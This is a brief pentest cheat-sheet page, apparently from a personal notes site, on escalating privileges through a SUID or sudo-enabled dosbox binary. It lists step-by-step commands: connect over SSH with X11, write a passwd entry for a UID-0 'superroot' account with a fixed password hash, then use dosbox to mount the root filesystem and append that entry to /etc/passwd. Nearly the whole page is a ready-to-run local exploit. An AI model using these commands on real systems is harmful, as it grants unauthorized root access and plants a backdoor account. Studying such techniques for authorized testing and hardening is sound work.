search
githubEdit

Dosbox Privilege Escalation

hashtag
Resources:

https://gtfobins.github.io/gtfobins/dosbox/

hashtag
Requirements:

dosbox has SUID bit, or user can run as sudo

Recommended to use with X11 GUI if possible

hashtag
1) Connect via SSH using X11

ssh -X user@TARGET_IP

hashtag
2) Create our superroot user to overwrite the /etc/passwd file

echo 'superroot:sXuCKi7k3Xh/s:0:0::/root:/bin/bash' > fkpasswd

hashtag
3) Run dosbox

dosbox

hashtag
4) In dosbox GUI, Overwrite /etc/passwd file

mount d /
D:
type D:\HOME\USER\FKPASSWD >> D:\ETC\PASSWD

hashtag
5) Get root

PreviousDocker Group Privilege EscalationNextDuplicati Privilege Escalation

Last updated